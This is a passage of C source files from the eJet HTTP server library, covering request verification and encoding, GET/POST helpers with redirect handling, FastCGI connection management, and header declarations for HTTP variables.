http_partial_parse(msg, HUValue(punit), punit->valuelen);
}
if (msg->req_query && msg->req_querylen > 0) {
if (!msg->req_query_kvobj) {
msg->req_query_kvobj = kvpair_init(37, "&", "=");
}
kvpair_decode(msg->req_query_kvobj, msg->req_query, msg->req_querylen);
}
return 0;
}
int http_req_verify (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
if (!msg) return -1;
if (strncasecmp(msg->req_ver, "HTTP/", 5) != 0) {
msg->SetStatus(msg, 400, NULL);
msg->Reply(msg);
return -100;
}
if (msg->req_ver_major != 1) {
msg->SetStatus(msg, 505, NULL);
msg->Reply(msg);
return -101;
}
if (msg->req_ver_minor > 0) {
if (http_header_get(msg, 0, "Host", 4) == NULL) {
msg->SetStatus(msg, 400, NULL);
msg->Reply(msg);
return -102;
}
}
return 0;
}
int http_req_encoding (void * vmsg, int encode)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HeaderUnit * punit = NULL;
int i;
int num;
char buf[256];
if (!msg) return -1;
mgmt = msg->httpmgmt;
frame_empty(msg->req_stream);
/* check if set proxy addr for next request. if it does, set dstip/dstport */
http_send_proxy_check(msg);
/* re-validate the Host header */
http_header_del(msg, 0, "Host", 4);
str_secpy(buf, sizeof(buf)-1, msg->req_host, msg->req_hostlen);
if (!msg->ssl_link && msg->req_port != 80) {
sprintf(buf + strlen(buf), ":%d", msg->req_port);
} else if (msg->ssl_link && msg->req_port != 443) {
sprintf(buf + strlen(buf), ":%d", msg->req_port);
}
http_header_append(msg, 0, "Host", -1, buf, str_len(buf));
http_cookie_add(msg);
/* building request line */
frame_append(msg->req_stream, msg->req_meth);
frame_put_last(msg->req_stream, ' ');
if (msg->proxy) {
if (encode)
frame_uri_encode(msg->req_stream, frameP(msg->uri->uri), frameL(msg->uri->uri), NULL);
else
frame_put_nlast(msg->req_stream, frameP(msg->uri->uri), frameL(msg->uri->uri));
frame_put_last(msg->req_stream, ' ');
if (strlen(msg->req_ver) > 0)
frame_append(msg->req_stream, msg->req_ver);//mgmt->httpver1);
else
frame_append(msg->req_stream, mgmt->httpver1);
frame_put_nlast(msg->req_stream, "\r\n", 2);
} else {
if (msg->req_pathlen > 0 && msg->req_path) {
if (encode)
frame_uri_encode(msg->req_stream, msg->req_path, msg->req_pathlen, NULL);
else
frame_put_nlast(msg->req_stream, msg->req_path, msg->req_pathlen);
} else {
frame_append(msg->req_stream, "/");
}
if (msg->req_querylen > 0 && msg->req_query) {
frame_put_last(msg->req_stream, '?');
if (encode)
frame_uri_encode(msg->req_stream, msg->req_query, msg->req_querylen, NULL);
else
frame_put_nlast(msg->req_stream, msg->req_query, msg->req_querylen);
}
frame_put_last(msg->req_stream, ' ');
if (strlen(msg->req_ver) > 0)
frame_append(msg->req_stream, msg->req_ver);//mgmt->httpver1);
else
frame_append(msg->req_stream, mgmt->httpver1);
frame_append(msg->req_stream, "\r\n");
}
if (msg->msgtype == 0) { //HTTPMsg is sending request to origin
msg->req_line = frameP(msg->req_stream);
msg->req_line_len = frameL(msg->req_stream) - 2;
}
if (!msg->req_useragent || msg->req_useragent_len <= 0) {
punit = http_header_get(msg, 0, "User-Agent", -1);
if (punit) {
msg->req_useragent = HUValue(punit);
msg->req_useragent_len = punit->valuelen;
}
}
http_header_del(msg, 0, "Proxy-Connection", 16);
//http_header_del(msg, 0, "If-Modified-Since", 17);
//http_header_del(msg, 0, "If-None-Match", 13);
if (msg->req_body_flag == BC_NONE && msg->proxied == 0) {
/* when Proxy mode, do not remove the body format such as
transfer-encoding or content-length */
http_header_del(msg, 0, "Content-Length", 14);
http_header_del(msg, 0, "Transfer-Encoding", 17);
}
/* checking non-proxied HTTPMsg if it's body-length is equal to the length of body-stream */
if (msg->req_body_flag == BC_CONTENT_LENGTH && msg->proxied == 0 &&
msg->req_body_length <= 0)
{
msg->req_body_length = chunk_size(msg->req_body_chunk, 0);
http_header_del(msg, 0, "Content-Length", -1);
http_header_append_int64(msg, 0, "Content-Length", 14, msg->req_body_length);
}
/* append all the headers */
num = arr_num(msg->req_header_list);
for (i = 0; i < num; i++) {
punit = (HeaderUnit *)arr_value(msg->req_header_list, i);
if (!punit || !punit->name || punit->namelen < 1) {
continue;
}
frame_put_nlast(msg->req_stream, HUName(punit), punit->namelen);
frame_put_nlast(msg->req_stream, ": ", 2);
if (HUValue(punit) && punit->valuelen > 0)
frame_put_nlast(msg->req_stream, HUValue(punit), punit->valuelen);
frame_put_nlast(msg->req_stream, "\r\n", 2);
}
/* append the trailer line of the http request header: a blank line */
frame_append(msg->req_stream, "\r\n");
msg->req_header_length = frameL(msg->req_stream);
msg->reqsent = 0;
msg->req_stream_sent = 0;
chunk_prepend_bufptr(msg->req_body_chunk, frameP(msg->req_stream), frameL(msg->req_stream), 1);
return 0;
}
int print_request (void * vmsg, FILE * fp)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HeaderUnit * unit = NULL;
char buf[2048];
int len = 0;
int i, num;
char * poct = NULL;
/* printf the request line */
if (fp == stdout || fp == stderr)
fprintf(fp, "\n-------------Request ConID=%lu MsgID=%ld reqfd=%d peer_addr=%s:%d ---------------\n",
http_con_id(msg->pcon), msg->msgid,
iodev_fd(http_con_iodev(msg->pcon)),
msg->srcip, msg->srcport);
fprintf(fp, " SourceAddr: %s : %d\n", msg->srcip, msg->srcport);
if (msg->req_host && msg->req_hostlen > 0) {
str_secpy(buf, sizeof(buf)-1, msg->req_host, msg->req_hostlen);
fprintf(fp, " RemoteHost: %s : %d\n", buf, msg->req_port);
} else {
fprintf(fp, " RemoteHost: : %d\n", msg->req_port);
}
if (msg->req_path && msg->req_pathlen > 0) {
str_secpy(buf, sizeof(buf)-1, msg->uri->path, msg->uri->pathlen);
fprintf(fp, " %s %s", msg->req_meth, buf);
} else if (msg->req_methind == HTTP_METHOD_CONNECT) {
str_secpy(buf, sizeof(buf)-1, msg->req_host, msg->req_hostlen);
fprintf(fp, " %s %s:%d", msg->req_meth, buf, msg->req_port);
} else {
fprintf(fp, " %s <NULL>", msg->req_meth);
}
if (msg->req_querylen > 0 && msg->req_query) {
str_secpy(buf, sizeof(buf)-1, msg->req_query, msg->req_querylen);
fprintf(fp, "?%s", buf);
}
fprintf(fp, " %s\n", msg->req_ver);
/* printf the request header */
num = arr_num(msg->req_header_list);
for (i = 0; i < num; i++) {
unit = (HeaderUnit *)arr_value(msg->req_header_list, i);
if (!unit) continue;
poct = HUName(unit);
if (unit->namelen > 0) {
str_secpy(buf, sizeof(buf)-1, poct, unit->namelen);
fprintf(fp, " %s: ", buf);
} else fprintf(fp, " : ");
poct = HUValue(unit);
if (unit->valuelen > 0) {
str_secpy(buf, sizeof(buf)-1, poct, unit->valuelen);
fprintf(fp, "%s\n", buf);
} else fprintf(fp, "\n");
}
/* printf the request body */
if ((len = frameL(msg->req_body_stream)) > 0) {
fprintf(fp, "request body %d bytes:\n", frameL(msg->req_body_stream));
if (len > 256) len = 256;
printOctet(fp, frameP(msg->req_body_stream), 0, len, 2);
}
if (msg->req_file_cache > 0) {
printf("request body stored %lld bytes in file:\n", msg->req_body_length);
printf(" TempCacheFile: %s\n", msg->req_file_name);
}
print_hashtab(msg->req_header_table, fp);
if (fp == stdout || fp == stderr)
fprintf(fp, "--------------------------end of the request: id=%ld ------------------------\n", msg->msgid);
fflush(fp);
return 0;
}
<|start_filename|>src/http_do.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "http_header.h"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_chunk.h"
#include "http_srv.h"
#include "http_srv_io.h"
#include "http_con.h"
#include "http_request.h"
static char * hdr_accept = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
static char * hdr_accept_charset = "utf-8, iso-8859-1, utf-16, *;q=0.7";
static char * hdr_accept_lang = "zh-CN, en-US";
int http_redirect_request (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPCon * pcon = NULL;
char * p = NULL;
int len = 0;
frame_p uri;
if (!msg) return -1;
if (++msg->redirecttimes >= 6) {
msg->SetStatus(msg, 417, NULL);
msg->DelResHdr(msg, "Location", 8);
msg->DelResHdr(msg, "Content-Length", -1);
msg->DelResHdr(msg, "Transfer-Encoding", -1);
msg->DelResHdr(msg, "Content-Type", -1);
tolog(1, "eJet - Redirect: HTTP auto-redirect '%s' too many times.\n",
http_uri_string(msg->uri));
return -100;
}
/* 301/302 response may redirect to another origin server.
msg->pcon is connected to original server and not used to send the msg */
msg->GetResHdrP(msg, "Location", 8, &p, &len);
if (!p || len < 1) {
tolog(1, "eJet - Redirect: invalid Location returned from request '%s'.\n",
http_uri_string(msg->uri));
return -100;
}
if (strncasecmp(p, "http://", 7) != 0 &&
strncasecmp(p, "https://", 8) != 0 &&
*p != '/')
{
uri = frame_new(512);
frame_put_nlast(uri, msg->uri->baseuri, msg->uri->baseurilen);
if (frame_read(uri, frameL(uri)-1) != '/')
frame_put_last(uri, '/');
frame_put_nlast(uri, p, len);
msg->SetURL(msg, frameP(uri), frameL(uri), 1);
frame_free(uri);
} else {
msg->SetURL(msg, p, len, 1);
}
msg->dstport = msg->req_port;
/* the original Cookie should be removed before encoding */
http_header_del(msg, 0, "Cookie", -1);
http_chunk_zero(msg->req_chunk);
chunk_zero(msg->req_body_chunk);
while (arr_num(msg->req_rcvs_list) > 0)
frame_free(arr_pop(msg->req_rcvs_list));
arr_zero(msg->req_rcvs_list);
http_msg_init_res(msg);
/* detach the msg from original httpcon */
pcon = msg->pcon;
http_con_msg_del(msg->pcon, msg);
if (pcon) {
/* debug http_con on 2020-10-20 */
http_con_close(pcon);
}
http_req_encoding(msg, 1);
msg->issued = 1;
chunk_set_end(msg->req_body_chunk);
if (http_srv_msg_dns(msg, http_srv_msg_dns_cb) < 0) {
http_msg_close(msg);
return -200;
}
return 0;
}
int do_http_request (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char * fname = NULL;
char * mime = NULL;
if (!msg) return -1;
if (msg->req_body_flag == BC_CONTENT_LENGTH) {
if (http_header_get(msg, 0, "Content-Type", -1) == NULL) {
if (chunk_is_file(msg->req_body_chunk, NULL, NULL, NULL, &fname)) {
mime = http_get_mime(msg->httpmgmt, fname, NULL);
msg->SetReqContentType(msg, mime, strlen(mime));
} else {
msg->SetReqContentType(msg, "application/octet-stream", -1);
}
}
}
http_req_encoding(msg, 1);
msg->issued = 1;
chunk_set_end(msg->req_body_chunk);
/* store current threadid as workerid, in order to set workerid for
new-created TCP iodev_t, assuring that ePump IO events delivered
to current worker thread. */
msg->workerid = get_threadid();
if (http_srv_msg_dns(msg, http_srv_msg_dns_cb) < 0) {
http_msg_close(msg);
return -100;
}
return 0;
}
void * do_http_get_msg (void * vmgmt, char * url, int urllen,
void * resfunc, void * para, void * cbval,
void * rcvprocfunc, void * rcvpara, uint64 rcvcbval,
char * resfile, long resoff)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPMsg * msg = NULL;
if (!mgmt || !url) return NULL;
if (urllen < 0) urllen = strlen(url);
if (urllen < 8) return NULL;
msg = http_msg_fetch(mgmt);
if (!msg) return NULL;
msg->SetMethod(msg, "GET", 3);
msg->SetURL(msg, url, urllen, 1);
msg->req_body_flag = BC_NONE;
msg->dstport = msg->req_port;
msg->SetResponseNotify(msg, resfunc, para, cbval, resfile, resoff,
rcvprocfunc, rcvpara, rcvcbval);
http_header_append(msg, 0, "Accept", -1, hdr_accept, strlen(hdr_accept));
http_header_append(msg, 0, "Accept-Charset", -1, hdr_accept_charset, strlen(hdr_accept_charset));
http_header_append(msg, 0, "Accept-Language", -1, hdr_accept_lang, strlen(hdr_accept_lang));
http_header_append(msg, 0, "Connection", -1, "keep-alive", -1);
http_header_append(msg, 0, "User-Agent", -1, mgmt->useragent, strlen(mgmt->useragent));
return msg;
}
void * do_http_get (void * vmgmt, char * url, int urllen,
void * resfunc, void * para, void * cbval,
void * rcvprocfunc, void * rcvpara, uint64 rcvcbval,
char * resfile, long resoff)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPMsg * msg = NULL;
if (!mgmt) return NULL;
msg = do_http_get_msg(mgmt, url, urllen, resfunc, para, cbval,
rcvprocfunc, rcvpara, rcvcbval, resfile, resoff);
if (!msg) return NULL;
if (do_http_request(msg) < 0) {
http_msg_close(msg);
msg = NULL;
}
return msg;
}
void * do_http_post_msg (void * vmgmt, char * url, int urllen, char * mime,
char * body, int bodylen,
char * fname, long offset, long length,
void * resfunc, void * para, void * cbval,
void * rcvprocfunc, void * rcvpara, uint64 rcvcbval,
void * sndprocfunc, void * sndpara, uint64 sndcbval,
char * resfile, long resoff)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPMsg * msg = NULL;
if (!mgmt || !url) return NULL;
if (urllen < 0) urllen = strlen(url);
if (urllen < 8) return NULL;
if (body && bodylen < 0) bodylen = strlen(body);
msg = http_msg_fetch(mgmt);
if (!msg) return NULL;
if ((body && bodylen > 0) || (fname && strlen(fname) > 0)) {
if (msg->req_body_chunk == NULL) {
msg->req_body_chunk = chunk_new(8192);
}
chunk_zero(msg->req_body_chunk);
msg->req_body_flag = BC_CONTENT_LENGTH;
}
msg->SetMethod(msg, "POST", 4);
msg->SetURL(msg, url, urllen, 1);
msg->req_body_flag = BC_CONTENT_LENGTH;
msg->dstport = msg->req_port;
msg->SetResponseNotify(msg, resfunc, para, cbval, resfile, resoff,
rcvprocfunc, rcvpara, rcvcbval);
http_header_append(msg, 0, "Accept", -1, hdr_accept, strlen(hdr_accept));
http_header_append(msg, 0, "Accept-Charset", -1, hdr_accept_charset, strlen(hdr_accept_charset));
http_header_append(msg, 0, "Accept-Language", -1, hdr_accept_lang, strlen(hdr_accept_lang));
http_header_append(msg, 0, "Connection", -1, "keep-alive", -1);
if (http_header_get(msg, 0, "User-Agent", -1) == NULL)
http_header_append(msg, 0, "User-Agent", -1, mgmt->useragent, strlen(mgmt->useragent));
if (body && bodylen > 0)
msg->AddReqContent(msg, body, bodylen);
if (fname && strlen(fname) > 0)
msg->AddReqFile(msg, fname, offset, length);
if (sndprocfunc) {
msg->req_send_procnotify = sndprocfunc;
msg->req_send_procnotify_para = sndpara;
msg->req_send_procnotify_cbval = sndcbval;
}
if (mime) msg->SetReqContentType(msg, mime, strlen(mime));
return msg;
}
void * do_http_post (void * vmgmt, char * url, int urllen, char * mime,
char * body, int bodylen,
char * fname, long offset, long length,
void * resfunc, void * para, void * cbval,
void * rcvprocfunc, void * rcvpara, uint64 rcvcbval,
void * sndprocfunc, void * sndpara, uint64 sndcbval,
char * resfile, long resoff)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPMsg * msg = NULL;
if (!mgmt) return NULL;
msg = do_http_post_msg(mgmt, url, urllen, mime, body, bodylen,
fname, offset, length,
resfunc, para, cbval,
rcvprocfunc, rcvpara, rcvcbval,
sndprocfunc, sndpara, sndcbval,
resfile, resoff);
if (!msg) return NULL;
if (do_http_request(msg) < 0) {
http_msg_close(msg);
msg = NULL;
}
return msg;
}
<|start_filename|>src/http_fcgi_con.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include "http_mgmt.h"
#include "http_fcgi_srv.h"
#include "http_fcgi_con.h"
#include "http_fcgi_msg.h"
#include "http_fcgi_io.h"
extern HTTPMgmt * gp_httpmgmt;
int http_fcgicon_cmp_http_fcgicon(void * a, void * b)
{
FcgiCon * acon = (FcgiCon *)a;
FcgiCon * bcon = (FcgiCon *)b;
if (!acon || !bcon) return -1;
if (acon->conid == bcon->conid) return 0;
if (acon->conid > bcon->conid) return 1;
return -1;
}
int http_fcgicon_cmp_conid (void * a, void * pat)
{
FcgiCon * pcon = (FcgiCon *)a;
ulong cid = *(ulong *)pat;
if (!pcon || !pat) return -1;
if (pcon->conid == cid) return 0;
if (pcon->conid > cid) return 1;
return -1;
}
ulong http_fcgicon_hash_func (void * key)
{
ulong cid = *(ulong *)key;
return cid;
}
int http_fcgicon_init (void * vcon)
{
FcgiCon * pcon = (FcgiCon *)vcon;
if (!pcon) return -1;
pcon->conid = 0;
pcon->rcv_state = FCGI_CON_NULL;
pcon->snd_state = FCGI_CON_IDLE;
memset(&pcon->dstip, 0, sizeof(pcon->dstip));
pcon->dstport = 0;
InitializeCriticalSection(&pcon->rcvCS);
if (pcon->pdev) {
iodev_close(pcon->pdev);
pcon->pdev = NULL;
}
pcon->read_ignored = 0;
if (pcon->rcvstream == NULL)
pcon->rcvstream = frame_new(8192);
frame_empty(pcon->rcvstream);
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
pcon->stamp = 0;
pcon->createtime = 0;
if (pcon->life_timer) {
iotimer_stop(pcon->life_timer);
pcon->life_timer = NULL;
}
pcon->retrytimes = 0;
pcon->reqnum = 0;
pcon->resnum = 0;
pcon->keepalive = 0;
if (pcon->msg) {
http_fcgimsg_close(pcon->msg);
pcon->msg = NULL;
}
InitializeCriticalSection(&pcon->msglistCS);
if (pcon->msg_list == NULL) {
pcon->msg_list = arr_new(4);
}
while (arr_num(pcon->msg_list) > 0)
http_fcgimsg_close(arr_pop(pcon->msg_list));
arr_zero(pcon->msg_list);
return 0;
}
int http_fcgicon_free (void * vcon)
{
FcgiCon * pcon = (FcgiCon *)vcon;
if (!pcon) return -1;
pcon->rcv_state = FCGI_CON_NULL;
pcon->snd_state = FCGI_CON_IDLE;
if (pcon->msg) {
http_fcgimsg_close(pcon->msg);
pcon->msg = NULL;
}
DeleteCriticalSection(&pcon->rcvCS);
if (pcon->pdev) {
iodev_close(pcon->pdev);
pcon->pdev = NULL;
}
pcon->read_ignored = 0;
frame_delete(&pcon->rcvstream);
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
if (pcon->life_timer) {
iotimer_stop(pcon->life_timer);
pcon->life_timer = NULL;
}
DeleteCriticalSection(&pcon->msglistCS);
while (arr_num(pcon->msg_list) > 0) {
if (pcon->srv)
http_fcgisrv_msg_push(pcon->srv, arr_pop(pcon->msg_list));
else
http_fcgimsg_close(arr_pop(pcon->msg_list));
}
arr_free(pcon->msg_list);
return 0;
}
void * http_fcgicon_fetch (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
HTTPMgmt * mgmt = NULL;
FcgiCon * pcon = NULL;
if (!srv) return NULL;
mgmt = (HTTPMgmt *)srv->mgmt;
if (!mgmt) return NULL;
pcon = mpool_fetch(mgmt->fcgicon_pool);
if (!pcon) {
pcon = kzalloc(sizeof(*pcon));
if (!pcon) return NULL;
http_fcgicon_init(pcon);
}
pcon->conid = http_fcgisrv_get_conid(srv);
pcon->srv = srv;
pcon->pcore = srv->pcore;
return pcon;
}
int http_fcgicon_recycle (void * vcon)
{
FcgiCon * pcon = (FcgiCon *)vcon;
FcgiSrv * srv = NULL;
FcgiMsg * msg = NULL;
HTTPMgmt * mgmt = NULL;
if (!pcon) return -1;
srv = (FcgiSrv *)pcon->srv;
if (!srv) return -2;
mgmt = (HTTPMgmt *)srv->mgmt;
if (!mgmt) return -3;
while (arr_num(pcon->msg_list) > 0) {
msg = arr_pop(pcon->msg_list);
http_fcgimsg_close(msg);
}
arr_zero(pcon->msg_list);
pcon->msg = NULL;
pcon->rcv_state = FCGI_CON_NULL;
pcon->snd_state = FCGI_CON_IDLE;
if (pcon->pdev) {
iodev_close(pcon->pdev);
pcon->pdev = NULL;
}
pcon->read_ignored = 0;
if (frame_size(pcon->rcvstream) > 16384)
frame_delete(&pcon->rcvstream);
frame_empty(pcon->rcvstream);
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
if (pcon->life_timer) {
iotimer_stop(pcon->life_timer);
pcon->life_timer = NULL;
}
if (mgmt->fcgicon_pool)
mpool_recycle(mgmt->fcgicon_pool, pcon);
else
http_fcgicon_free(pcon);
return 0;
}
int http_fcgicon_close (void * vcon)
{
FcgiCon * pcon = (FcgiCon *)vcon;
if (!pcon) return -1;
if (http_fcgisrv_con_del(pcon->srv, pcon->conid) != pcon) {
return -2;
}
return http_fcgicon_recycle(pcon);
}
void * http_fcgicon_open (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
FcgiCon * pcon = NULL;
if (!srv) return NULL;
pcon = http_fcgicon_fetch(srv);
if (!pcon) return NULL;
pcon->socktype = srv->socktype;
strcpy(pcon->unixsock, srv->unixsock);
strcpy(pcon->dstip, srv->ip);
pcon->dstport = srv->port;
time(&pcon->stamp);
if (http_fcgicon_connect(pcon) < 0) {
return NULL;
}
http_fcgisrv_con_add(srv, pcon);
return pcon;
}
int http_fcgicon_connect (void * vpcon)
{
FcgiCon * pcon = (FcgiCon *)vpcon;
int ret = 0;
if (!pcon) return -1;
for (pcon->retrytimes++ ; pcon->retrytimes < 3; pcon->retrytimes++) {
if (pcon->pdev) {
iodev_close(pcon->pdev);
pcon->pdev = NULL;
}
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
EnterCriticalSection(&pcon->rcvCS);
if (pcon->socktype == 0) {
pcon->pdev = eptcp_connect(pcon->pcore,
pcon->dstip, pcon->dstport,
NULL, 0,
(void *)pcon->conid, &ret,
http_fcgisrv_pump, pcon->srv);
} else {
#ifdef UNIX
/* open unix socket */
pcon->pdev = epusock_connect(pcon->pcore,
pcon->unixsock,
(void *)pcon->conid, &ret,
http_fcgisrv_pump, pcon->srv);
#endif
}
if (!pcon->pdev) {
LeaveCriticalSection(&pcon->rcvCS);
continue;
}
if (ret >= 0) { //connect successfully
LeaveCriticalSection(&pcon->rcvCS);
ret = http_fcgicon_connected(pcon);
if (ret < 0) continue;
} else {
pcon->snd_state = FCGI_CON_CONNECTING;
pcon->ready_timer = iotimer_start(pcon->pcore,
12 * 1000,
t_fcgi_srv_con_build,
(void *)pcon->conid,
http_fcgisrv_pump, pcon->srv);
LeaveCriticalSection(&pcon->rcvCS);
}
return 0;
}
if (pcon->socktype == 0)
tolog(1, "eJet - FastCGI Connect: failed to build TCP Connection to server '%s:%d'.\n",
pcon->dstip, pcon->dstport);
else
tolog(1, "eJet - FastCGI Connect: failed to build Unix Socket to server '%s'.\n",
pcon->unixsock);
if (pcon->pdev) {
iodev_close(pcon->pdev);
pcon->pdev = NULL;
}
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
pcon->snd_state = FCGI_CON_IDLE;
http_fcgicon_close(pcon);
return -100;
}
int http_fcgicon_connected (void * vpcon)
{
FcgiCon * pcon = (FcgiCon *)vpcon;
if (!pcon) return -1;
pcon->rcv_state = FCGI_CON_READY;
pcon->snd_state = FCGI_CON_SEND_READY;
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
time(&pcon->stamp);
pcon->life_timer = iotimer_start(pcon->pcore,
6 * 1000,
t_fcgi_srv_con_life,
(void *)pcon->conid,
http_fcgisrv_pump,
pcon->srv);
/* send request to the origin server instantly after connected */
if (arr_num(pcon->msg_list) > 0 || http_fcgisrv_msg_num(pcon->srv) > 0) {
http_fcgi_send(pcon);
}
return 0;
}
int http_fcgicon_reqnum (void * vcon)
{
FcgiCon * pcon = (FcgiCon *)vcon;
if (!pcon) return 0;
return pcon->reqnum;
}
ulong http_fcgicon_id (void * vcon)
{
FcgiCon * pcon = (FcgiCon *)vcon;
if (!pcon) return 0;
return pcon->conid;
}
void * http_fcgicon_device (void * vcon)
{
FcgiCon * pcon = (FcgiCon *)vcon;
if (!pcon) return NULL;
return pcon->pdev;
}
int http_fcgicon_msg_add (void * vcon, void * vmsg)
{
FcgiCon * pcon = (FcgiCon *)vcon;
FcgiMsg * msg = (FcgiMsg *)vmsg;
int i, num;
if (!pcon) return -1;
if (!msg) return -2;
EnterCriticalSection(&pcon->msglistCS);
msg->pcon = pcon;
msg->conid = pcon->conid;
num = arr_num(pcon->msg_list);
for (i = 0; i < num; i++) {
if (arr_value(pcon->msg_list, i) == msg) {
LeaveCriticalSection(&pcon->msglistCS);
return 0;
}
}
arr_push(pcon->msg_list, msg);
LeaveCriticalSection(&pcon->msglistCS);
return 0;
}
int http_fcgicon_msg_del (void * vcon, void * vmsg)
{
FcgiCon * pcon = (FcgiCon *)vcon;
FcgiMsg * msg = (FcgiMsg *)vmsg;
if (!pcon) return -1;
if (!msg) return -2;
EnterCriticalSection(&pcon->msglistCS);
arr_delete_ptr(pcon->msg_list, msg);
if (msg->pcon == pcon)
msg->pcon = NULL;
if (msg->conid == pcon->conid)
msg->conid = 0;
LeaveCriticalSection(&pcon->msglistCS);
return 0;
}
void * http_fcgicon_msg_first (void * vcon)
{
FcgiCon * pcon = (FcgiCon *)vcon;
FcgiMsg * msg = NULL;
if (!pcon) return NULL;
EnterCriticalSection(&pcon->msglistCS);
msg = arr_value(pcon->msg_list, 0);
LeaveCriticalSection(&pcon->msglistCS);
return msg;
}
void * http_fcgicon_msg_last (void * vcon)
{
FcgiCon * pcon = (FcgiCon *)vcon;
FcgiMsg * msg = NULL;
int num = 0;
if (!pcon) return NULL;
EnterCriticalSection(&pcon->msglistCS);
num = arr_num(pcon->msg_list);
if (num > 0)
msg = arr_value(pcon->msg_list, num - 1);
LeaveCriticalSection(&pcon->msglistCS);
return msg;
}
<|start_filename|>include/http_variable.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_VARIABLE_H_
#define _HTTP_VARIABLE_H_
#ifdef __cplusplus
extern "C" {
#endif
#define fldsizeof(type, field) sizeof(((type *)0)->field)
#define http_var_set(var, stname, field, vtype, uns, sttype) \
(var)->fieldpos = offsetof(stname, field); \
(var)->fldlenpos = 0; \
(var)->haslen = 0; \
(var)->valtype = vtype; \
(var)->unsign = uns; \
(var)->structtype = sttype
#define http_var_set2(var, stname, field, fldlen, vtype, uns, sttype) \
(var)->fieldpos = offsetof(stname, field); \
(var)->fldlenpos = offsetof(stname, fldlen); \
(var)->haslen = 1; \
(var)->valtype = vtype; \
(var)->unsign = uns; \
(var)->structtype = sttype
#define http_var_set3(var, vtype, sttype) \
(var)->fieldpos = 0; \
(var)->fldlenpos = 0; \
(var)->haslen = 0; \
(var)->valtype = vtype; \
(var)->unsign = 0; \
(var)->structtype = sttype
#define http_var_set4(var, stname, field, subst, subfld, vtype, uns, sttype) \
(var)->fieldpos = offsetof(stname, field); \
(var)->subfldpos = offsetof(subst, subfld); \
(var)->substruct= 1; \
(var)->haslen = 0; \
(var)->valtype = vtype; \
(var)->unsign = uns; \
(var)->structtype = sttype
#define http_var_set5(var, stname, field, subst, subfld, subfldlen, vtype, uns, sttype) \
(var)->fieldpos = offsetof(stname, field); \
(var)->subfldpos = offsetof(subst, subfld); \
(var)->subfldlenpos = offsetof(subst, subfldlen); \
(var)->substruct= 1; \
(var)->haslen = 1; \
(var)->valtype = vtype; \
(var)->unsign = uns; \
(var)->structtype = sttype
#define http_var_set6(var, stname, field, subfld, vtype, uns) \
(var)->fieldpos = offsetof(stname, field); \
(var)->subfldpos = offsetof(stname, subfld); \
(var)->valtype = vtype; \
(var)->condcheck = 1; \
(var)->unsign = uns;
#define http_var_global(var, fldname, vtype, uns, sttype) \
(var)->field = fldname; \
(var)->fldlenpos = 0; \
(var)->haslen = 0; \
(var)->valtype = vtype; \
(var)->unsign = uns; \
(var)->structtype = sttype
typedef struct http_variable_s {
char varname[32];
void * field;
size_t fieldpos; //relative to HTTPMsg instance
size_t fldlenpos; //relative to HTTPMsg instance
size_t subfldpos;
size_t subfldlenpos;
/* 0-char 1-short 2-int 3-int64 4-char[] 5-char * 6-frame_p 7-array 8-function 9-pointer */
unsigned valtype : 4;
unsigned unsign : 1; //0-signed 1-unsigned
unsigned structtype : 4; //0-HTTPMsg 1-HTTPMgmt 2-HTTPLoc 3-global variable 4-other
unsigned haslen : 1; //0-ignore fldlenpos/subfldlenpos 1-in use of fldlenpos
unsigned substruct : 2; //0-no sub struct 1-sub struct
/* 1-request header 2-cookie 3-query 4-response header 5-datetime 6-date 7-time */
unsigned arraytype : 4;
unsigned condcheck : 1; //check HTTPMsg->msgtype == 1 ? first-var : second-var
} http_var_t, HTTPVar;
int http_var_init (void * vmgmt);
int http_var_free (void * vmgmt);
int http_var_value (void * vmsg, char * vname, char * buf, int len);
int http_var_copy (void * vmsg, char * vstr, int vlen, char * buf, int buflen,
ckstr_t * pmat, int matnum, char * lastvname, int lastvtype);
void http_var_print (void * vmsg, char * varn, int len);
int http_var_header_value (void * vmsg, int type, char * name, int namelen, char * buf, int len);
int http_var_cookie_value (void * vmsg, char * name, int namelen, char * buf, int len);
int http_var_query_value (void * vmsg, char * name, int namelen, char * buf, int len);
int http_var_datetime_value(void * vmsg, char * name, int namelen, char * buf, int len, int type);
typedef struct var_obj_s {
char * name;
int namelen;
char * value;
int valuelen;
uint8 valtype;
} var_obj_t;
void * var_obj_alloc();
void var_obj_free (void * vobj);
int var_obj_cmp_name (void * a, void * b);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_cache.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_CACHE_H_
#define _HTTP_CACHE_H_
#ifdef __cplusplus
extern "C" {
#endif
